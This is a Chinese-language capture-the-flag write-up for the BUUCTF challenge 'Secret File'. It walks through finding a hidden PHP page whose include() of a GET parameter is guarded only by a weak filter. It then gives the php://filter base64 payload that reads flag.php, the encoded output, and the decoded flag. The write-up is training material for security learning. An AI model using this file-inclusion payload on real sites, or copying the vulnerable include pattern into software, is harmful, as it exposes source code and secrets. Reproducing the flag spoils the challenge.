php伪协议请求，php代码审计 参考：BUUCTF__[极客大挑战 2019]Secret File_题解

没有任何上传和登录页面
查看前端源码
发现

<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>

访问页面

“SECRET”可以点击，查看源码，链接的是action.php

<a id="master" href="./action.php" style="background-color:red;height:50px;width:200px;color:#FFFFFF;left:44%;"><font size="6">SECRET</font></a>

进去后，页面提示“没看清么”
同时顶部的php名字却是“end.php”
感觉是中间显示了什么，猜测要抓包看一下

(中间重开了靶机，域名有变化)

在点击Secert按钮后，抓包内容里显示有一个被注释掉的php页面提示

secr3t.php

访问，看到代码，审计。。

可以看到代码里过滤了不少名称的文件访问
tp，input，data
大概率就这三文件夹里

<html><title>secret</title><meta charset="UTF-8">
<?phphighlight_file(__FILE__);error_reporting(0);$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "Oh no!";exit();}include($file); 
//flag放在了flag.php里
?>
</html>

这里卡住了，搜索wp ，提到了“php伪协议”

?file=php://filter/read=convert.base64-encode/resource=./flag.php

同时拿到了一串编码

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7MWRjMTAxYjktZDQ4OC00ZDQ5LThkYmYtZWI5NDViOGJiZDM4fSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

解码后即可看到flag：flag{1dc101b9-d488-4d49-8dbf-eb945b8bbd38}

<!DOCTYPE html><html><head><meta charset="utf-8"><title>FLAG</title></head><body style="background-color:black;"><br><br><br><br><br><br><h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br><p style="font-family:arial;color:red;font-size:20px;text-align:center;"><?phpecho "我就在这里";$flag = 'flag{1dc101b9-d488-4d49-8dbf-eb945b8bbd38}';$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'?></p></body></html>